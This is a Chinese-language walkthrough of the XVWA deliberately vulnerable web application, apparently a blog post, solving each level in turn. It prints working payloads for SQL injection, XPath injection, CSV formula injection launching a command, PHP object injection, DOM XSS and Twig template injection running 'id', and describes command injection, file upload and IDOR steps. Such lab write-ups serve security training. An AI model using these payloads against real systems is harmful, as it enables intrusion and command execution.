首先修改config.php文件

XVWA通关教程

在创建数据库,打开setup页面提交即可安装成功

XVWA通关教程

XVWA通关教程

安装完毕,直接给图

XVWA通关教程

SQL Injection

XVWA通关教程

看到源码中两个参数带进去查询了,都没有过滤,一个where语句,一个模糊查询语句

XVWA通关教程

构造语句,爆出数据库

1' union select 1,2,3,database(),5,6,7#

XVWA通关教程

还有一个参数item参数,我们抓包改下代码即可

-1 and updatexml(1,concat(0x7e,(database()),0x7e),1)#

XVWA通关教程

SQL Injection-Blind

XVWA通关教程

XVWA通关教程

这关还是一样啊,不多说了,下一关

OS Command Injection

这里源码是想执行ping命令的,我们用windows的管道符执行我们的语句即可

XVWA通关教程

XVWA通关教程

XPATH Injection

用1' or '1'='1来执行我们的语句,遍历所有内容

XVWA通关教程

XVWA通关教程

源码中我们输入的值可以用单引号包裹前面在用我们的语句后面再包裹即可

CSV Formula Injection

 

在之前我们要先提交内容上去

在第三个内容处添加上1+cmd|' /C calc'!A0

XVWA通关教程

XVWA通关教程

XVWA通关教程

把文件下载下来,打开之后会弹框点击是即可

XVWA通关教程

XVWA通关教程

PHP Object Injection

点击按钮会看到url中一些东西,那个就是序列化内容了

XVWA通关教程

源码中可以看到把我们r参数反序列化之后用eval执行了,所有直接构造语句让它执行我们的代码

XVWA通关教程

O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}

XVWA通关教程

Unrestricted File Upload

这里直接上传php文件即可,下一关

XVWA通关教程

XVWA通关教程

XSS reflected

 

直接输出的,不多说

XVWA通关教程

XVWA通关教程

XSS Stored

XVWA通关教程

这里防止了sql注入,但是没有防护xss

XVWA通关教程

XSS DOM

<img src=1 οnerrοr=alert(/xss/)>

XVWA通关教程

File inclusion

把要包含的文件写在file参数里即可,可越级

XVWA通关教程

Session Flaws

登录之前和登录后session都是一样的,我们先退出登录

XVWA通关教程

在未登录情况下抓包修改COOKIE参数即可

Insecure Direct Object Reference

可以看到只有五个选项可以选择

XVWA通关教程

我们把url中的item参数改成6可以越权查看

XVWA通关教程

Missing Functional Level Access Control

源码中有个删除功能,加上action参数我们是可控的,即把改变参数实现删除

XVWA通关教程

XVWA通关教程

我们发现更改密码后会出现在url中,我们让管理员访问这个url即可修改密码

XVWA通关教程

Unvalidated Redirects and Forwards

检查元素发现有个url链接

我们更改下参数就会跳转到其他页面了

192.168.56.1/xvwa/vulnerabilities/redirect/redirect.php?forward=https://www.baidu.com

XVWA通关教程

SSTI

XVWA通关教程

我们可以输入

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

实现命令执行

XVWA通关教程

攻略结束~~~

相关文章:

  • 2021-11-25
  • 2021-11-22
  • 2021-06-08
  • 2021-12-26
  • 2021-06-03
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-11-04
  • 2021-07-03
  • 2021-12-29
  • 2023-01-31
  • 2021-08-26
  • 2021-10-07
  • 2022-02-10
相关资源
相似解决方案